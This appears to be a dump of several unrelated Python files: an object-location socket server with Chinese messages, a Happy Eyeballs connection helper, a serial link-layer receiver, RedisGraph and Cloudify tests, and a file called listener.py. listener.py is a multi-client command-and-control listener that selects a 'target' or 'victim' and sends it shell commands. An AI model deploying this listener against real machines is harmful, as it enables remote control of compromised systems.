self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的左手邊\n'.encode('utf-8'))
elif obj_x <= table_x - w/2 and obj_x >= table_x - w:
# object is at position 1
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的右手邊\n'.encode('utf-8'))
else:
# object is at position 2 or 3
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的前方\n'.encode('utf-8'))
elif obj_y >= table_y - h/2 and obj_y <= table_y and obj_x >= table_x - w and obj_x <= table_x + w:
# object is at down half of the table on the image
if obj_x >= table_x + w/2 and obj_x <= table_x + w:
# object is at position 8
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的左前方\n'.encode('utf-8'))
elif obj_x <= table_x - w/2 and obj_x >= table_x - w:
# object is at position 5
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的右前方\n'.encode('utf-8'))
else:
# object is at position 2 or 3
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的前方\n'.encode('utf-8'))
else:
# object is not in the range of table
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('不在桌子上,請使用另一指令\n'.encode('utf-8'))
else: # person is in front of the table (not facing the camera)
if obj_y >= table_y - h/2 and obj_y <= table_y and obj_x >= table_x - w and obj_x <= table_x + w:
if obj_x >= table_x + w/2 and obj_x <= table_x + w:
# position 8
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的右手邊\n'.encode('utf-8'))
elif obj_x <= table_x - w/2 and obj_x >= table_x - w:
# position 5
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的左手邊\n'.encode('utf-8'))
else:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的前方\n'.encode('utf-8'))
elif obj_y >= table_y - h and obj_y <= table_y - h/2 and obj_x >= table_x - w and obj_x <= table_x + w:
if obj_x >= table_x + w/2 and obj_x <= table_x + w:
# position 4
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的右前方\n'.encode('utf-8'))
elif obj_x <= table_x - w/2 and obj_x >= table_x - w:
# position 1
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的左前方\n'.encode('utf-8'))
else:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('在你面對桌子上的前方\n'.encode('utf-8'))
else:
self.cs.send(self.translateEtoC(self.obj).encode('utf-8'))
self.cs.send('不在桌子上,請使用另一指令\n'.encode('utf-8'))
# update before_pos[]
rl = 0
while rl + 3 <= len(result_list):
same = False
for bp in before_pos: # every obj in result_list is compared with whole before_pos list
if result_list[rl] == bp[0]:
same = True
bp[1] = result_list[rl+1]
bp[2] = result_list[rl+2]
if not same: # new detected object
tmp = []
tmp.append(result_list[rl])
tmp.append(result_list[rl+1])
tmp.append(result_list[rl+2])
before_pos.append(tmp)
if result_list[rl] == 'diningtable': # skip h and w
rl += 2
rl += 3
print('updated object: ', before_pos, '\n')
else:
send_msg = '指令錯誤 請重新輸入\n'
self.cs.send(send_msg.encode('utf-8'))
# self.gui.text_change('client: ' + self.recv_msg.decode('utf-8'))
def draw_circle(self, event, x, y, flags, param):
global ix, iy, co, tx1, tx2, ty1, ty2, px, py, sx1, sx2, sy1, sy2
ix, iy = 0.000, 0.000
if event == cv2.EVENT_LBUTTONDOWN:
ix, iy = x, y
cv2.rectangle(self.rframe, (ix, iy), (x, y), (0, 255, 0), 4)
# cv2.rectangle(self.img, (ix, iy), (x, y), (0, 255, 0), 4)
px.append(ix)
py.append(iy)
co = co+1
if(co == 3):
print('initial coordinate: '
'(', px[1], ',', py[1], ')'
'(', px[2], ',', py[2], ')'
'(', px[3], ',', py[3], ')')
# convert coordinate
sx1 = rx[1] - rx[0]
sy1 = ry[1] - ry[0]
sy2 = ry[2] - ry[0]
sx2 = rx[2] - rx[0]
tx1 = px[2] - px[1]
ty1 = py[2] - py[1]
tx2 = px[3] - px[1]
ty2 = py[3] - py[1]
def four(self, xx, yy): # get the real coordinate of the 4th point
global t, t1, t2
ix, iy = xx, yy
if xx == 320 and yy == 480:
t1 = 320 - px[1]
t2 = 480 - py[1]
else:
px.append(ix)
py.append(iy)
t1 = px[4+t]-px[1]
t2 = py[4+t]-py[1]
# print(xx, yy, px[4+t], py[4+t], t1, t2)
t = t + 1
a = np.array([[tx1, tx2], [ty1, ty2]])
b = np.array([t1, t2])
c = solve(a, b)
return c
def direction(self, xx, yy):
xx, yy = int(float(xx)), (-1)*int(float(yy))
# (x1,y1), (x2,y2) are points on the line, (xx,yy) is point to be checked
if xx > 320:
x1, y1 = 320, -480
x2, y2 = 640, -295 # the two points on the 30 degree line
x3, y3 = 597, 0 # the two points on the 60 degree line
cal_30 = ((xx-x1) * (y2-y1)) - ((yy-y1) * (x2-x1))
if cal_30 > 0:
return "右手邊"
else:
cal_60 = ((xx-x1) * (y3-y1)) - ((yy-y1) * (x3-x1))
if cal_60 > 0:
return "右前方"
else:
return "前方"
elif xx <= 320:
x1, y1 = 320, -480
x2, y2 = 0, -295
x3, y3 = 43, 0
cal_30 = ((xx-x1) * (y2-y1)) - ((yy-y1) * (x2-x1))
if cal_30 <= 0:
return "左手邊"
else:
cal_60 = ((xx-x1) * (y3-y1)) - ((yy-y1) * (x3-x1))
if cal_60 > 0:
return "前方"
else:
return "左前方"
def distance(self, x1, y1, x2, y2):
x1, y1, x2, y2 = float(x1), float(y1), float(x2), float(y2)
xdis = x1 - x2
ydis = y1 - y2
real_xdis = xdis * (sx1 + sx2)
real_ydis = ydis * (sy1 + sy2)
tot_dis = pow((pow(real_xdis, 2) + pow(real_ydis, 2)), 0.5)
return int(tot_dis)
def translateEtoC(self, s):
if s == 'box':
return '箱子'
elif s == 'chair':
return '椅子'
elif s == 'dehumidifier':
return '除溼機'
elif s == 'diningtable':
return '桌子'
elif s == 'fan':
return '電風扇'
elif s == 'mug':
return '杯子'
elif s == 'person':
return '人'
elif s == 'sun glasses':
return '墨鏡'
elif s == 'sweepingrobot':
return '掃地機器人'
else:
return s
def translateCtoE(self, s):
if s == '電風扇' or s == '電扇':
return 'fan'
elif s == '椅子':
return 'chair'
elif s == '桌子':
return 'diningtable'
elif s == '箱子':
return 'box'
elif s == '除溼機':
return 'dehumidifier'
elif s == '掃地機器人':
return 'sweepingrobot'
elif s == '人':
return 'person'
elif s == '墨鏡':
return 'sun glasses'
elif s == '杯子':
return 'mug'
else:
return s
def validCommand(self, s): # check if the input commands are valid
if s[-6:] == '有沒有移動過':
self.obj = s[:len(s)-6]
self.obj = self.translateCtoE(self.obj)
return 1
elif s[-3:] == '在哪裡':
self.obj = s[:len(s)-3]
self.obj = self.translateCtoE(self.obj)
return 2
elif s == '記錄家具位置':
return 3
elif s[0:3] == '我想找':
self.obj = s[3:]
self.obj = self.translateCtoE(self.obj)
return 4
else:
return 0
def isMoved(self, s, before_pos, result_list):
before = []
after = []
for bp in before_pos:
if bp[0] == self.obj:
before = [bp[1], bp[2]]
break
for index, rl in enumerate(result_list):
if rl == self.obj:
after = [result_list[index+1], result_list[index+2]]
break
if before == [] or after == []: # object not detected
return 1
elif abs(float(before[0]) - float(after[0])) > 30 or abs(float(before[1]) - float(after[1])) > 30: # moved
return 2
else: # not moved
return 3
class Socket:
def __init__(self):
self.sock = None
Server_GUI.iscreate1 = True
def create(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((TCP_IP, TCP_PORT))
print('host and port: ', TCP_IP, TCP_PORT)
self.sock.listen(5)
count = 0
print('Waiting for connection...')
while True:
self.s, addr = self.sock.accept()
print('~~~~~~~~~~~~~~~~~~~~~~~~~~')
print('Connection address:', addr)
receive = ReceiveThread(self.s, count)
receive.start()
count += 1
def ssend(self):
print('> ' + send_msg, end = '')
self.s.send(send_msg.encode('utf-8'))
|
happyeyeballs.py
|
#!/usr/bin/env python
# Python implementation of RFC 6555 / Happy Eyeballs: find the quickest IPv4/IPv6 connection
# See https://tools.ietf.org/html/rfc6555
# Method: Start parallel sessions using threads, and only wait for the quickest succesful socket connect
# If the HOST has an IPv6 address, IPv6 is given a head start by delaying IPv4. See https://tools.ietf.org/html/rfc6555#section-4.1
# You can run this as a standalone program, or as a module:
'''
from happyeyeballs import happyeyeballs
print happyeyeballs('newszilla.xs4all.nl', port=119)
'''
# or with more logging:
'''
from happyeyeballs import happyeyeballs
import logging
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
print happyeyeballs('newszilla.xs4all.nl', port=119)
'''
import socket
import ssl
import Queue
import threading
import time
import logging
DEBUG = False
# called by each thread
def do_socket_connect(queue, ip, PORT, SSL, ipv4delay):
# connect to the ip, and put the result into the queue
if DEBUG: logging.debug("Input for thread is %s %s %s", ip, PORT, SSL)
try:
# CREATE SOCKET
if ip.find(':') >= 0:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
if ip.find('.') >= 0:
time.sleep(ipv4delay) # IPv4 ... so a delay for IPv4 as we prefer IPv6. Note: ipv4delay could be 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
if not SSL:
# Connect ...
s.connect((ip, PORT))
# ... and close
s.close()
else:
# WRAP SOCKET
wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
# CONNECT
wrappedSocket.connect((ip, PORT))
# CLOSE SOCKET CONNECTION
wrappedSocket.close()
queue.put((ip, True))
if DEBUG: logging.debug("connect to %s OK", ip)
except:
queue.put((ip, False))
if DEBUG: logging.debug("connect to %s not OK", ip)
pass
def happyeyeballs(HOST, **kwargs):
# Happyeyeballs function, with caching of the results
# Fill out the parameters into the variables
try:
PORT = kwargs['port']
except:
PORT = 80
try:
SSL = kwargs['ssl']
except:
SSL = False
try:
preferipv6 = kwargs['preferipv6']
except:
preferipv6 = True # prefer IPv6, so give IPv6 connects a head start by delaying IPv4
# Find out if a cached result is available, and recent enough:
timecurrent = int(time.time()) # current time in seconds since epoch
retentionseconds = 100
hostkey = (HOST, PORT, SSL, preferipv6) # Example key: (u'ssl.astraweb.com', 563, True, True)
try:
happyeyeballs.happylist[hostkey] # just to check: does it exist?
# No exception, so entry exists, so let's check the time:
timecached = happyeyeballs.happylist[hostkey][1]
if timecurrent - timecached <= retentionseconds:
if DEBUG: logging.debug("existing cached result recent enough")
return happyeyeballs.happylist[hostkey][0]
else:
if DEBUG: logging.debug("existing cached result too old. Find a new one")
# Continue a few lines down
except:
# Exception, so entry not there, so we have to fill it out
if DEBUG: logging.debug("Host not yet in the cache. Find entry")
pass
# we only arrive here if the entry has to be determined. So let's do that:
# We have to determine the (new) best IP address
start = time.clock()
if DEBUG: logging.debug("\n\n%s %s %s %s", HOST, PORT, SSL, preferipv6)
ipv4delay = 0
try:
# Check if there is an AAAA / IPv6 result for this host:
info = socket.getaddrinfo(HOST, PORT, socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
if DEBUG: logging.debug("IPv6 address found for %s", HOST)
if preferipv6:
ipv4delay=0.1 # preferipv6, AND at least one IPv6 found, so give IPv4 (!) a delay so that IPv6 has a head start and is preferred
except:
if DEBUG: logging.debug("No IPv6 address found for %s", HOST)
myqueue = Queue.Queue() # queue used for threads giving back the results
try:
# Get all IP (IPv4 and IPv6) addresses:
allinfo = socket.getaddrinfo(HOST, PORT, 0, 0, socket.IPPROTO_TCP)
for info in allinfo:
address = info[4][0]
thisthread = threading.Thread(target=do_socket_connect, args=(myqueue, address, PORT, SSL, ipv4delay))
thisthread.daemon = True
thisthread.start()
result = None # default return value, used if none of threads says True/"OK", so no connect on any IP address
# start reading from the Queue for message from the threads:
for i in range(len(allinfo)):
s = myqueue.get() # get a response
if s[1] == True:
result = s[0]
break # the first True/"OK" is enough, so break out of for loop
except:
if DEBUG: logging.debug("something went wrong in the try block")
result = None
logging.info("Quickest IP address for %s (port %s, ssl %s, preferipv6 %s) is %s", HOST, PORT, SSL, preferipv6, result)
delay = int(1000 * (time.clock() - start))
logging.debug("Happy Eyeballs lookup and port connect took %s ms", delay)
# We're done. Store and return the result
if result:
happyeyeballs.happylist[hostkey] = ( result, timecurrent )
if DEBUG: logging.debug("Determined new result for %s with result %s", (hostkey, happyeyeballs.happylist[hostkey]) )
return result
happyeyeballs.happylist = {} # The cached results. This static variable must be after the def happyeyeballs()
if __name__ == '__main__':
logger = logging.getLogger('')
logger.setLevel(logging.INFO)
if DEBUG: logger.setLevel(logging.DEBUG)
# plain HTTP/HTTPS sites:
print happyeyeballs('www.google.com')
print happyeyeballs('www.google.com', port=443, ssl=True)
print happyeyeballs('www.nu.nl')
# newsservers:
print happyeyeballs('newszilla6.xs4all.nl', port=119)
print happyeyeballs('newszilla.xs4all.nl', port=119)
print happyeyeballs('block.cheapnews.eu', port=119)
print happyeyeballs('block.cheapnews.eu', port=443, ssl=True)
print happyeyeballs('sslreader.eweka.nl', port=563, ssl=True)
print happyeyeballs('news.thundernews.com', port=119)
print happyeyeballs('news.thundernews.com', port=119, preferipv6=False)
print happyeyeballs('secure.eu.thundernews.com', port=563, ssl=True)
# Strange cases
print happyeyeballs('does.not.resolve', port=443, ssl=True)
print happyeyeballs('www.google.com', port=119)
print happyeyeballs('216.58.211.164')
|
listener.py
|
import socket ,signal
import sys,os
import threading
import time
from queue import Queue
def listener():
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
all_connections = []
all_address = []
def controlc_signal(signal,frame):
quit_gracefully(signal=None, frame=None)
def register_signal_handler():
signal.signal(signal.SIGINT, quit_gracefully)
signal.signal(signal.SIGTERM, quit_gracefully)
return
def quit_gracefully(signal=None, frame=None):
#print('\nQuitting gracefully')
for conn in all_connections:
try:
conn.shutdown(2)
conn.close()
except Exception as e:
print('Could not close connection %s' % str(e))
break
# continue
s.close()
sys.exit(0)
# Create a Socket ( connect two computers)
signal.signal(signal.SIGINT,controlc_signal)
def create_socket():
try:
global host
global port
global s
host = ""
try:
port = int(input("Port >> "))
except:
print ("Wrong !!! ")
print ("quitting....")
quit_gracefully(signal=None, frame=None)
s = socket.socket()
except socket.error as msg:
print("Socket creation error: " + str(msg))
# Binding the socket and listening for connections
def bind_socket():
try:
global host
global port
global s
print("Binding the Port: " + str(port))
try:
s.bind((host, port))
except:
print ("Port : %s already in use"%port)
return 1
s.listen(5)
except socket.error as msg:
print("Socket Binding error" + str(msg) + "\n" + "Retrying...")
bind_socket()
# Handling connection from multiple clients and saving to a list
# Closing previous connections when server.py file is restarted
def accepting_connections():
for c in all_connections:
c.close()
del all_connections[:]
del all_address[:]
while True:
try:
conn, address = s.accept()
s.setblocking(1) # prevents timeout
all_connections.append(conn)
all_address.append(address)
print("Connection has been established :" + address[0])
except:
#print("Error accepting connections")
break
# 2nd thread functions - 1) See all the clients 2) Select a client 3) Send commands to the connected client
# Interactive prompt for sending commands
# turtle> list
# 0 Friend-A Port
# 1 Friend-B Port
# 2 Friend-C Port
# turtle> select 1
# 192.168.0.112> dir
def start_turtle():
while True:
cmd = input('turtle> ')
if cmd == 'list':
list_connections()
elif 'select' in cmd:
conn = get_target(cmd)
if conn is not None:
send_target_commands(conn)
elif cmd == 'help':
print('''
help show this command
list show Target list
select select Target such as > select 0
''')
elif cmd == '':
None
elif cmd == 'exit' or cmd == 'quit':
queue.task_done()
queue.task_done()
print('Server shutdown')
#break
quit_gracefully()
else:
print("Command not recognized")
# Display all current active connections with client
def list_connections():
results = ''
for i, conn in enumerate(all_connections):
try:
conn.send(str.encode(' '))
conn.recv(20480)
except:
del all_connections[i]
del all_address[i]
continue
results = str(i) + " " + str(all_address[i][0]) + " " + str(all_address[i][1]) + "\n"
print("----Clients----" + "\n" + results)
# Selecting the target
def get_target(cmd):
try:
target = cmd.replace('select ', '') # target = id
target = int(target)
conn = all_connections[target]
print("You are now connected to :" + str(all_address[target][0]))
print(str(all_address[target][0]) + ">", end="")
return conn
# 192.168.0.4> dir
except:
print("Selection not valid")
return None
# Send commands to client/victim or a friend
def send_target_commands(conn):
while True:
try:
cmd = input()
if cmd == 'quit' or cmd == 'exit':
break
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_response = str(conn.recv(20480), "utf-8")
print(client_response, end="")
except:
print("Error sending commands")
break
# Create worker threads
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
# Do next job that is in the queue (handle connections, send commands)
def work():
while True:
x = queue.get()
if x == 1:
create_socket()
bind_socket()
accepting_connections()
break
if x == 2:
start_turtle()
queue.task_done()
def create_jobs():
for x in JOB_NUMBER:
queue.put(x)
queue.join()
create_workers()
create_jobs()
|
enlaceRx.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#####################################################
# Camada Física da Computação
#Carareto
#17/02/2018
# Camada de Enlace
####################################################
# Importa pacote de tempo
import time
# Threads
import threading
# Class
class RX(object):
def __init__(self, fisica):
self.fisica = fisica
self.buffer = bytes(bytearray())
self.threadStop = False
self.threadMutex = True
self.READLEN = 1024
def thread(self):
while not self.threadStop:
if(self.threadMutex == True):
rxTemp, nRx = self.fisica.read(self.READLEN)
if (nRx > 0):
self.buffer += rxTemp
time.sleep(0.01)
def threadStart(self):
self.thread = threading.Thread(target=self.thread, args=())
self.thread.start()
def threadKill(self):
self.threadStop = True
def threadPause(self):
self.threadMutex = False
def threadResume(self):
self.threadMutex = True
def getIsEmpty(self):
if(self.getBufferLen() == 0):
return(True)
else:
return(False)
def getBufferLen(self):
return(len(self.buffer))
def getAllBuffer(self, len):
self.threadPause()
b = self.buffer[:]
self.clearBuffer()
self.threadResume()
return(b)
def getBuffer(self, nData):
self.threadPause()
b = self.buffer[0:nData]
self.buffer = self.buffer[nData:]
self.threadResume()
return(b)
def getNData(self, size):
inactive = 0
last_buffer = self.buffer
while(self.getBufferLen() < size):
# print(inactive)
if self.buffer == last_buffer:
inactive += 1
else:
inactive = 0
if inactive >= 100:
return(0, [])
time.sleep(0.05)
return(1, self.getBuffer(size))
def clearBuffer(self):
self.buffer = b""
|
test_concurrent_query.py
|
import os
import sys
import unittest
import threading
from redisgraph import Graph, Node, Edge
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from disposableredis import DisposableRedis
from base import FlowTestsBase
GRAPH_ID = "G" # Graph identifier.
CLIENT_COUNT = 16 # Number of concurrent connections.
graphs = None # One graph object per client.
assertions = [True] * CLIENT_COUNT # Each thread places its verdict at position threadID.
people = ["Roi", "Alon", "Ailon", "Boaz", "Tal", "Omri", "Ori"]
def redis():
return DisposableRedis(loadmodule=os.path.dirname(os.path.abspath(__file__)) + '/../../src/redisgraph.so')
def query_aggregate(graph, query, threadID):
global assertions
assertions[threadID] = True
for i in range(10):
actual_result = graph.query(query)
person_count = actual_result.result_set[0][0]
if person_count != len(people):
assertions[threadID] = False
break
def query_neighbors(graph, query, threadID):
global assertions
assertions[threadID] = True
# Fully connected graph + header row.
expected_resultset_size = len(people) * (len(people)-1)
for i in range(10):
actual_result = graph.query(query)
if len(actual_result.result_set) is not expected_resultset_size:
assertions[threadID] = False
break
def query_write(graph, query, threadID):
global assertions
assertions[threadID] = True
for i in range(10):
actual_result = graph.query(query)
if actual_result.nodes_created != 1 or actual_result.properties_set != 1:
assertions[threadID] = False
break
def delete_graph(graph, threadID):
global assertions
assertions[threadID] = True
# Try to delete graph.
try:
graph.delete()
except:
# Graph deletion failed.
assertions[threadID] = False
class ConcurrentQueryFlowTest(FlowTestsBase):
@classmethod
def setUpClass(cls):
global graphs
graphs = []
print "ConcurrentQueryFlowTest"
cls.r = redis()
cls.r.start()
for i in range(0, CLIENT_COUNT):
conn = cls.r.client()
graphs.append(Graph(GRAPH_ID, conn))
cls.populate_graph()
@classmethod
def tearDownClass(cls):
cls.r.stop()
@classmethod
def populate_graph(cls):
nodes = {}
graph = graphs[0]
# Create entities
for p in people:
node = Node(label="person", properties={"name": p})
graph.add_node(node)
nodes[p] = node
# Fully connected graph
for src in nodes:
for dest in nodes:
if src != dest:
edge = Edge(nodes[src], "know", nodes[dest])
graph.add_edge(edge)
graph.commit()
# Count number of nodes in the graph
def test01_concurrent_aggregation(self):
q = """MATCH (p:person) RETURN count(p)"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_aggregate, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
assert(assertions[i])
# Concurrently get neighbors of every node.
def test02_retrieve_neighbors(self):
q = """MATCH (p:person)-[know]->(n:person) RETURN n.name"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_neighbors, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
assert(assertions[i])
# Concurrent writes
def test_03_concurrent_write(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
q = """CREATE (c:country {id:"%d"})""" % i
t = threading.Thread(target=query_write, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
assert(assertions[i])
# Try to delete graph multiple times.
def test_04_concurrent_delete(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=delete_graph, args=(graph, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
# Exactly one thread should have successfully deleted the graph.
assert(assertions.count(True) == 1)
if __name__ == '__main__':
unittest.main()
|
test_proxy.py
|
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import os
import threading
import time
import sys
import subprocess
from StringIO import StringIO
import testtools
from pytest import mark
from cloudify.mocks import MockCloudifyContext
from cloudify.proxy import client
from cloudify.proxy.server import (UnixCtxProxy,
TCPCtxProxy,
HTTPCtxProxy,
PathDictAccess)
IS_WINDOWS = os.name == 'nt'
class CtxProxyTestBase(object):
class StubAttribute(object):
some_property = 'some_value'
@staticmethod
def stub_method(*args):
return args
@staticmethod
def stub_sleep(seconds):
time.sleep(float(seconds))
@staticmethod
def stub_args(arg1, arg2, arg3='arg3', arg4='arg4', *args, **kwargs):
return dict(
arg1=arg1,
arg2=arg2,
arg3=arg3,
arg4=arg4,
args=args,
kwargs=kwargs)
def setUp(self, proxy_server_class):
super(CtxProxyTestBase, self).setUp()
self.ctx = MockCloudifyContext(node_id='instance_id', properties={
'prop1': 'value1',
'prop2': {
'nested_prop1': 'nested_value1'
},
'prop3': [
{'index': 0, 'value': 'value_0'},
{'index': 1, 'value': 'value_1'},
{'index': 2, 'value': 'value_2'}
],
'prop4': {
'key': 'value'
}
})
self.ctx.stub_method = self.stub_method
self.ctx.stub_sleep = self.stub_sleep
self.ctx.stub_args = self.stub_args
self.ctx.stub_attr = self.StubAttribute()
self.server = proxy_server_class(self.ctx)
self.start_server()
def start_server(self):
self.stop_server = False
self.server_stopped = False
def serve():
while not self.stop_server:
self.server.poll_and_process(timeout=0.1)
self.server.close()
self.server_stopped = True
self.server_thread = threading.Thread(target=serve)
self.server_thread.daemon = True
self.server_thread.start()
def stop_server_now(self):
self.stop_server = True
while not self.server_stopped:
time.sleep(0.1)
def tearDown(self):
super(CtxProxyTestBase, self).tearDown()
self.stop_server_now()
def request(self, *args):
return client.client_req(self.server.socket_url, args)
def test_attribute_access(self):
response = self.request('stub_attr', 'some_property')
self.assertEqual(response, 'some_value')
def test_sugared_attribute_access(self):
response = self.request('stub-attr', 'some-property')
self.assertEqual(response, 'some_value')
def test_dict_prop_access_get_key(self):
response = self.request('node', 'properties', 'prop1')
self.assertEqual(response, 'value1')
def test_dict_prop_access_get_key_nested(self):
response = self.request('node', 'properties', 'prop2.nested_prop1')
self.assertEqual(response, 'nested_value1')
def test_dict_prop_access_get_with_list_index(self):
response = self.request('node', 'properties', 'prop3[2].value')
self.assertEqual(response, 'value_2')
def test_dict_prop_access_set(self):
self.request('node', 'properties', 'prop4.key', 'new_value')
self.request('node', 'properties', 'prop3[2].value', 'new_value_2')
self.request('node', 'properties', 'prop4.some.new.path',
'some_new_value')
self.assertEqual(self.ctx.node.properties['prop4']['key'], 'new_value')
self.assertEqual(
self.ctx.node.properties['prop3'][2]['value'],
'new_value_2')
self.assertEqual(
self.ctx.node.properties['prop4']['some']['new']['path'],
'some_new_value')
def test_method_invocation(self):
args = ['arg1', 'arg2', 'arg3']
response_args = self.request('stub-method', *args)
self.assertEqual(args, response_args)
def test_method_invocation_no_args(self):
response = self.request('stub-method')
self.assertEqual([], response)
def test_method_invocation_kwargs(self):
arg1 = 'arg1'
arg2 = 'arg2'
arg4 = 'arg4_override'
arg5 = 'arg5'
kwargs = dict(
arg4=arg4,
arg5=arg5)
response = self.request('stub_args', arg1, arg2, kwargs)
self.assertEqual(response, dict(
arg1=arg1,
arg2=arg2,
arg3='arg3',
arg4=arg4,
args=[],
kwargs=dict(
arg5=arg5)))
def test_empty_return_value(self):
response = self.request('blueprint', 'id')
self.assertIsNone(response)
def test_client_request_timeout(self):
if hasattr(self, 'expected_exception'):
expected_exception = self.expected_exception
else:
expected_exception = RuntimeError
self.assertRaises(expected_exception,
client.client_req,
self.server.socket_url,
['stub-sleep', '0.5'],
0.1)
def test_processing_exception(self):
self.assertRaises(client.RequestError,
self.request, 'property_that_does_not_exist')
def test_not_json_serializable(self):
self.assertRaises(client.RequestError,
self.request, 'logger')
def test_no_string_arg(self):
args = ['stub_method', 1, 2]
response = self.request(*args)
self.assertEqual(args[1:], response)
@mark.skipif(IS_WINDOWS, reason='Test skipped on Windows')
class TestUnixCtxProxy(CtxProxyTestBase, testtools.TestCase):
def setUp(self):
super(TestUnixCtxProxy, self).setUp(UnixCtxProxy)
class TestTCPCtxProxy(CtxProxyTestBase, testtools.TestCase):
def setUp(self):
super(TestTCPCtxProxy, self).setUp(TCPCtxProxy)
class TestHTTPCtxProxy(CtxProxyTestBase, testtools.TestCase):
def setUp(self):
super(TestHTTPCtxProxy, self).setUp(HTTPCtxProxy)
def start_server(self):
pass
def stop_server_now(self):
self.server.close()
def test_client_request_timeout(self):
self.expected_exception = IOError
super(TestHTTPCtxProxy, self).test_client_request_timeout()
class TestArgumentParsing(testtools.TestCase):
def mock_client_req(self, socket_url, args, timeout):
self.assertEqual(socket_url, self.expected.get('socket_url'))
self.assertEqual(args, self.expected.get('args'))
self.assertEqual(timeout, int(self.expected.get('timeout')))
return self.mock_response
def setUp(self):
super(TestArgumentParsing, self).setUp()
self.original_client_req = client.client_req
client.client_req = self.mock_client_req
self.addCleanup(self.restore)
self.expected = dict(
args=[],
timeout=30,
socket_url='stub')
self.mock_response = None
os.environ['CTX_SOCKET_URL'] = 'stub'
def restore(self):
client.client_req = self.original_client_req
if 'CTX_SOCKET_URL' in os.environ:
del os.environ['CTX_SOCKET_URL']
def test_socket_url_arg(self):
self.expected.update(dict(
socket_url='sock_url'))
client.main(['--socket-url', self.expected.get('socket_url')])
def test_socket_url_env(self):
expected_socket_url = 'env_sock_url'
os.environ['CTX_SOCKET_URL'] = expected_socket_url
self.expected.update(dict(
socket_url=expected_socket_url))
client.main([])
def test_socket_url_missing(self):
del os.environ['CTX_SOCKET_URL']
self.assertRaises(RuntimeError,
client.main, [])
def test_args(self):
self.expected.update(dict(
args=['1', '2', '3']))
client.main(self.expected.get('args'))
def test_timeout(self):
self.expected.update(dict(
timeout='10'))
client.main(['--timeout', self.expected.get('timeout')])
self.expected.update(dict(
timeout='15'))
client.main(['-t', self.expected.get('timeout')])
def test_mixed_order(self):
self.expected.update(dict(
args=['1', '2', '3'],
timeout='20',
socket_url='mixed_socket_url'))
client.main(
['-t', self.expected.get('timeout')] +
['--socket-url', self.expected.get('socket_url')] +
self.expected.get('args'))
client.main(
['-t', self.expected.get('timeout')] +
self.expected.get('args') +
['--socket-url', self.expected.get('socket_url')])
client.main(
self.expected.get('args') +
['-t', self.expected.get('timeout')] +
['--socket-url', self.expected.get('socket_url')])
def test_json_args(self):
args = ['@1', '@[1,2,3]', '@{"key":"value"}']
expected_args = [1, [1, 2, 3], {'key': 'value'}]
self.expected.update(dict(
args=expected_args))
client.main(args)
def test_json_arg_prefix(self):
args = ['_1', '@1']
expected_args = [1, '@1']
self.expected.update(dict(
args=expected_args))
client.main(args + ['--json-arg-prefix', '_'])
def test_json_output(self):
self.assert_valid_output('string', 'string', '"string"')
self.assert_valid_output(1, '1', '1')
self.assert_valid_output([1, '2'], "[1, '2']", '[1, "2"]')
self.assert_valid_output({'key': 1},
"{'key': 1}",
'{"key": 1}')
self.assert_valid_output(False, '', 'false')
self.assert_valid_output(True, 'True', 'true')
self.assert_valid_output([], '', '[]')
self.assert_valid_output({}, '', '{}')
def assert_valid_output(self, response, ex_typed_output, ex_json_output):
self.mock_response = response
current_stdout = sys.stdout
def run(args, expected):
output = StringIO()
